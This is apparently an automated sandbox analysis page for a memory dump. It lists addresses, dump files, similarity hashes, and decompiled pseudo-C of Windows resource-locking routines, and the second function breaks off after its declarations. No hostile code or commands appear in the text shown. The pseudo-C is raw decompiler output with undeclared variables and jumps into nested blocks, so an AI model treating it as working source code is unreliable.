                                                                                                                                                        0x01fb0c75
                                                                                                                                                        0x01fb0c7a
                                                                                                                                                        0x01fdeb54
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdeb5a
                                                                                                                                                        0x01fb0c80
                                                                                                                                                        0x01fb0c84
                                                                                                                                                        0x01fdeb98
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdeba6
                                                                                                                                                        0x01fb0cb8
                                                                                                                                                        0x01fb0cba
                                                                                                                                                        0x01fb0cd3
                                                                                                                                                        0x01fb0cda
                                                                                                                                                        0x01fb0ce4
                                                                                                                                                        0x01fb0ce9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0cec
                                                                                                                                                        0x01fb0c8c
                                                                                                                                                        0x01fdeb63
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdeb70
                                                                                                                                                        0x01fdeb75
                                                                                                                                                        0x01fdeb7d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdeb8c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdeb8c
                                                                                                                                                        0x01fb0c96
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0ca2
                                                                                                                                                        0x01fb0cac
                                                                                                                                                        0x01fb0cb4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0b44
                                                                                                                                                        0x01fb0b47
                                                                                                                                                        0x01fb0b49
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0b4f
                                                                                                                                                        0x01fb0b50
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0b56
                                                                                                                                                        0x01fb0b62
                                                                                                                                                        0x01fb0b7c
                                                                                                                                                        0x01fb0bac
                                                                                                                                                        0x01fb0a0f
                                                                                                                                                        0x01fdeaaa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdeac4
                                                                                                                                                        0x01fdeac4
                                                                                                                                                        0x01fb0bd0
                                                                                                                                                        0x01fb0bd0
                                                                                                                                                        0x01fb0bd4
                                                                                                                                                        0x01fb0bd9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0bdb
                                                                                                                                                        0x01fb0be0
                                                                                                                                                        0x01fdeb0e
                                                                                                                                                        0x01fb0a1a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0a1a
                                                                                                                                                        0x01fdeb1a
                                                                                                                                                        0x01fdeb1f
                                                                                                                                                        0x01fdeb27
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdeb36
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdeb36
                                                                                                                                                        0x01fb0bea
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0bf6
                                                                                                                                                        0x01fb0c00
                                                                                                                                                        0x01fb0c03
                                                                                                                                                        0x01fb0c0b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0c0b
                                                                                                                                                        0x01fdeaaa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0a15
                                                                                                                                                        0x01fb0bb6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0bc6
                                                                                                                                                        0x01fb0bc6
                                                                                                                                                        0x01fb0bcb
                                                                                                                                                        0x01fb0c15
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0c1d
                                                                                                                                                        0x01fb0c20
                                                                                                                                                        0x01fb0c21
                                                                                                                                                        0x01fb0c24
                                                                                                                                                        0x01fb0c24
                                                                                                                                                        0x01fb0c26
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0c26
                                                                                                                                                        0x01fb0bcd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0bcd
                                                                                                                                                        0x01fb0b89
                                                                                                                                                        0x01fb0b89
                                                                                                                                                        0x01fb0b90
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0b96
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0b96
                                                                                                                                                        0x01fb0a04
                                                                                                                                                        0x01fb0a04
                                                                                                                                                        0x01fb0b9a
                                                                                                                                                        0x01fb0b9a
                                                                                                                                                        0x01fb0b9b
                                                                                                                                                        0x01fb0b9f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0ba5
                                                                                                                                                        0x01fb0ac7
                                                                                                                                                        0x01fb0aca
                                                                                                                                                        0x01fdeacf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdeade
                                                                                                                                                        0x01fdeade
                                                                                                                                                        0x01fdeae3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdeaf3
                                                                                                                                                        0x01fdeaf6
                                                                                                                                                        0x01fdeaf7
                                                                                                                                                        0x01fdeafe
                                                                                                                                                        0x01fdeb01
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdeb01
                                                                                                                                                        0x01fdeacf
                                                                                                                                                        0x01fb0ad0
                                                                                                                                                        0x01fb0ad4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0ada
                                                                                                                                                        0x01fb0ae6
                                                                                                                                                        0x01fb0c34
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0c47
                                                                                                                                                        0x01fb0c49
                                                                                                                                                        0x01fb0c4a
                                                                                                                                                        0x01fb0c4e
                                                                                                                                                        0x01fb0c51
                                                                                                                                                        0x01fb0c54
                                                                                                                                                        0x01fb0c57
                                                                                                                                                        0x01fb0c5a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0c60
                                                                                                                                                        0x01fb0afb
                                                                                                                                                        0x01fb0afe
                                                                                                                                                        0x01fb0b02
                                                                                                                                                        0x01fb0b05
                                                                                                                                                        0x01fb0b08
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0b08
                                                                                                                                                        0x01fb0ae6
                                                                                                                                                        0x01fb0b44
                                                                                                                                                        0x01fb09f8
                                                                                                                                                        0x01fb09f8
                                                                                                                                                        0x01fb09f9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdeaa0
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fassign
                                                                                                                                                        • String ID: .$:$:
                                                                                                                                                        • API String ID: 3965848254-2308638275
                                                                                                                                                        • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                        • Instruction ID: d13209b659a9bb27cee30bb6ce9ff40bd52df696b2ff62639c6f4e86e1835237
                                                                                                                                                        • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                        • Instruction Fuzzy Hash: 90A180B1D0070ADADB25CF5AC8856FFBBB9AF05304F28846AF542A7241DF329A41CB51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01FB0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                        			E01FB0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020501c0;
									_push(_t144);
									_push(0);
									_t51 = E01F6F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E01FB4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E01FC3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E01FC3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E01FF217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E01FC3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E01FB3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020501c0;
												_push(_t138);
												_push(0);
												_t58 = E01F6F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E01FB4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E01FC3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E01FC3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E01FF217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E01FC3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E01FB3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E01F95384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E01F6F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E01FB3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E01F6F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E01FB3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E01F6F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E01FB3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E01F95329(_t110, _t138);
																_t69 = E01F953A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                                                                                                                        0x01fb055a
                                                                                                                                                        0x01fb055d
                                                                                                                                                        0x01fb0563
                                                                                                                                                        0x01fb0566
                                                                                                                                                        0x01fb05d8
                                                                                                                                                        0x01fb05e2
                                                                                                                                                        0x01fb05e5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb05e7
                                                                                                                                                        0x01fb05e7
                                                                                                                                                        0x01fb05ea
                                                                                                                                                        0x01fb05f3
                                                                                                                                                        0x01fb05f3
                                                                                                                                                        0x01fb0568
                                                                                                                                                        0x01fb0568
                                                                                                                                                        0x01fb0568
                                                                                                                                                        0x01fb0569
                                                                                                                                                        0x01fb0569
                                                                                                                                                        0x01fb0569
                                                                                                                                                        0x01fb056b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd217f
                                                                                                                                                        0x01fd2183
                                                                                                                                                        0x01fd225b
                                                                                                                                                        0x01fd225f
                                                                                                                                                        0x01fd2189
                                                                                                                                                        0x01fd218c
                                                                                                                                                        0x01fd218f
                                                                                                                                                        0x01fd2194
                                                                                                                                                        0x01fd2199
                                                                                                                                                        0x01fd219d
                                                                                                                                                        0x01fd21a0
                                                                                                                                                        0x01fd21a2
                                                                                                                                                        0x01fd21ce
                                                                                                                                                        0x01fd21ce
                                                                                                                                                        0x01fd21ce
                                                                                                                                                        0x01fd21d0
                                                                                                                                                        0x01fd21d6
                                                                                                                                                        0x01fd21de
                                                                                                                                                        0x01fd21e2
                                                                                                                                                        0x01fd21e8
                                                                                                                                                        0x01fd21e9
                                                                                                                                                        0x01fd21ec
                                                                                                                                                        0x01fd21f1
                                                                                                                                                        0x01fd21f6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd21f8
                                                                                                                                                        0x01fd21fb
                                                                                                                                                        0x01fd2206
                                                                                                                                                        0x01fd220b
                                                                                                                                                        0x01fd220c
                                                                                                                                                        0x01fd2217
                                                                                                                                                        0x01fd2226
                                                                                                                                                        0x01fd222b
                                                                                                                                                        0x01fd222c
                                                                                                                                                        0x01fd222f
                                                                                                                                                        0x01fd2232
                                                                                                                                                        0x01fd2235
                                                                                                                                                        0x01fd2235
                                                                                                                                                        0x01fd223a
                                                                                                                                                        0x01fd223f
                                                                                                                                                        0x01fd2241
                                                                                                                                                        0x01fd2243
                                                                                                                                                        0x01fd2248
                                                                                                                                                        0x01fd2248
                                                                                                                                                        0x01fd224d
                                                                                                                                                        0x01fd224f
                                                                                                                                                        0x01fd2262
                                                                                                                                                        0x01fd2263
                                                                                                                                                        0x01fd2268
                                                                                                                                                        0x01fd2269
                                                                                                                                                        0x01fd2269
                                                                                                                                                        0x01fd2269
                                                                                                                                                        0x01fd226d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd2276
                                                                                                                                                        0x01fd2279
                                                                                                                                                        0x01fd227e
                                                                                                                                                        0x01fd2283
                                                                                                                                                        0x01fd2287
                                                                                                                                                        0x01fd228a
                                                                                                                                                        0x01fd228d
                                                                                                                                                        0x01fd228f
                                                                                                                                                        0x01fd22bc
                                                                                                                                                        0x01fd22bc
                                                                                                                                                        0x01fd22bc
                                                                                                                                                        0x01fd22be
                                                                                                                                                        0x01fd22c4
                                                                                                                                                        0x01fd22cc
                                                                                                                                                        0x01fd22d0
                                                                                                                                                        0x01fd22d6
                                                                                                                                                        0x01fd22d7
                                                                                                                                                        0x01fd22da
                                                                                                                                                        0x01fd22df
                                                                                                                                                        0x01fd22e4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd22e6
                                                                                                                                                        0x01fd22e9
                                                                                                                                                        0x01fd22f4
                                                                                                                                                        0x01fd22f9
                                                                                                                                                        0x01fd22fa
                                                                                                                                                        0x01fd2305
                                                                                                                                                        0x01fd2314
                                                                                                                                                        0x01fd2319
                                                                                                                                                        0x01fd231a
                                                                                                                                                        0x01fd231d
                                                                                                                                                        0x01fd2320
                                                                                                                                                        0x01fd2323
                                                                                                                                                        0x01fd2323
                                                                                                                                                        0x01fd2328
                                                                                                                                                        0x01fd232d
                                                                                                                                                        0x01fd232f
                                                                                                                                                        0x01fd2331
                                                                                                                                                        0x01fd2336
                                                                                                                                                        0x01fd2336
                                                                                                                                                        0x01fd233b
                                                                                                                                                        0x01fd233d
                                                                                                                                                        0x01fd2350
                                                                                                                                                        0x01fd2351
                                                                                                                                                        0x01fd2356
                                                                                                                                                        0x01fd2359
                                                                                                                                                        0x01fd2359
                                                                                                                                                        0x01fd235b
                                                                                                                                                        0x01fd235d
                                                                                                                                                        0x01f95367
                                                                                                                                                        0x01f9536b
                                                                                                                                                        0x01f95372
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd2363
                                                                                                                                                        0x01fd2363
                                                                                                                                                        0x01fd2369
                                                                                                                                                        0x01fd236a
                                                                                                                                                        0x01fd236c
                                                                                                                                                        0x01fd2371
                                                                                                                                                        0x01fd2373
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd2379
                                                                                                                                                        0x01fd2379
                                                                                                                                                        0x01fd237a
                                                                                                                                                        0x01fd237f
                                                                                                                                                        0x01fd237f
                                                                                                                                                        0x01fd2385
                                                                                                                                                        0x01fd2386
                                                                                                                                                        0x01fd2389
                                                                                                                                                        0x01fd238e
                                                                                                                                                        0x01fd2390
                                                                                                                                                        0x01f95378
                                                                                                                                                        0x01f9537c
                                                                                                                                                        0x01fd2396
                                                                                                                                                        0x01fd2396
                                                                                                                                                        0x01fd2397
                                                                                                                                                        0x01fd239c
                                                                                                                                                        0x01fd23a2
                                                                                                                                                        0x01fd23a3
                                                                                                                                                        0x01fd23a6
                                                                                                                                                        0x01fd23ab
                                                                                                                                                        0x01fd23ad
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd23b3
                                                                                                                                                        0x01fd23b3
                                                                                                                                                        0x01fd23b4
                                                                                                                                                        0x01fd23b9
                                                                                                                                                        0x01fd23ba
                                                                                                                                                        0x01fd23ba
                                                                                                                                                        0x01fd23bc
                                                                                                                                                        0x01fd23bf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fc9153
                                                                                                                                                        0x01fc9158
                                                                                                                                                        0x01fc915a
                                                                                                                                                        0x01fc915e
                                                                                                                                                        0x01fc9160
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fc9166
                                                                                                                                                        0x01fc9166
                                                                                                                                                        0x01fc9171
                                                                                                                                                        0x01fc9176
                                                                                                                                                        0x01fc9176
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fc9160
                                                                                                                                                        0x01fd23c6
                                                                                                                                                        0x01fd23ce
                                                                                                                                                        0x01fd23d7
                                                                                                                                                        0x01fd23d7
                                                                                                                                                        0x01fd23ad
                                                                                                                                                        0x01fd2390
                                                                                                                                                        0x01fd2373
                                                                                                                                                        0x01fd233f
                                                                                                                                                        0x01fd233f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd233f
                                                                                                                                                        0x01fd2291
                                                                                                                                                        0x01fd2291
                                                                                                                                                        0x01fd2293
                                                                                                                                                        0x01fd2295
                                                                                                                                                        0x01fd229a
                                                                                                                                                        0x01fd22a1
                                                                                                                                                        0x01fd22a3
                                                                                                                                                        0x01fd22a7
                                                                                                                                                        0x01fd22a9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd22ab
                                                                                                                                                        0x01fd22ad
                                                                                                                                                        0x01fd22af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd22af
                                                                                                                                                        0x01fd22b1
                                                                                                                                                        0x01fd22b4
                                                                                                                                                        0x01fd22b4
                                                                                                                                                        0x01fd22b6
                                                                                                                                                        0x01f953be
                                                                                                                                                        0x01f953be
                                                                                                                                                        0x01f953be
                                                                                                                                                        0x01f953c0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f953cb
                                                                                                                                                        0x01f953ce
                                                                                                                                                        0x01f953d0
                                                                                                                                                        0x01f953d4
                                                                                                                                                        0x01f953d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f953d8
                                                                                                                                                        0x01f953e3
                                                                                                                                                        0x01f953ea
                                                                                                                                                        0x01f953ea
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f953d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd22b6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd228f
                                                                                                                                                        0x01fd2349
                                                                                                                                                        0x01fd234d
                                                                                                                                                        0x01fd2251
                                                                                                                                                        0x01fd2251
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd2251
                                                                                                                                                        0x01fd21a4
                                                                                                                                                        0x01fd21a4
                                                                                                                                                        0x01fd21a6
                                                                                                                                                        0x01fd21a8
                                                                                                                                                        0x01fd21ac
                                                                                                                                                        0x01fd21b6
                                                                                                                                                        0x01fd21b8
                                                                                                                                                        0x01fd21bc
                                                                                                                                                        0x01fd21be
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd21c0
                                                                                                                                                        0x01fd21c2
                                                                                                                                                        0x01fd21c4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd21c4
                                                                                                                                                        0x01fd21c6
                                                                                                                                                        0x01fd21c6
                                                                                                                                                        0x01fd21c8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd21c8
                                                                                                                                                        0x01fd21a2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd2183
                                                                                                                                                        0x01fb057b
                                                                                                                                                        0x01fb057d
                                                                                                                                                        0x01fb0581
                                                                                                                                                        0x01fb0583
                                                                                                                                                        0x01fd2178
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0589
                                                                                                                                                        0x01fb058f
                                                                                                                                                        0x01fb058f
                                                                                                                                                        0x01fb0583
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01FD2206
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                        • API String ID: 885266447-4236105082
                                                                                                                                                        • Opcode ID: 7e14a8a8b044ece05c1bbcde080f85da3cc211bfb93e709a6af9893f63a29573
                                                                                                                                                        • Instruction ID: dca7bca31cbd74be4376a8577c9ec816dd77d71fdfe7769e689f4a2a8b611fdd
                                                                                                                                                        • Opcode Fuzzy Hash: 7e14a8a8b044ece05c1bbcde080f85da3cc211bfb93e709a6af9893f63a29573
                                                                                                                                                        • Instruction Fuzzy Hash: 19512835B00212ABEB15CE29CCC1FA673AAAF94721F25825DFD55DB285D923EC4287D0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01FB14C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                        			E01FB14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
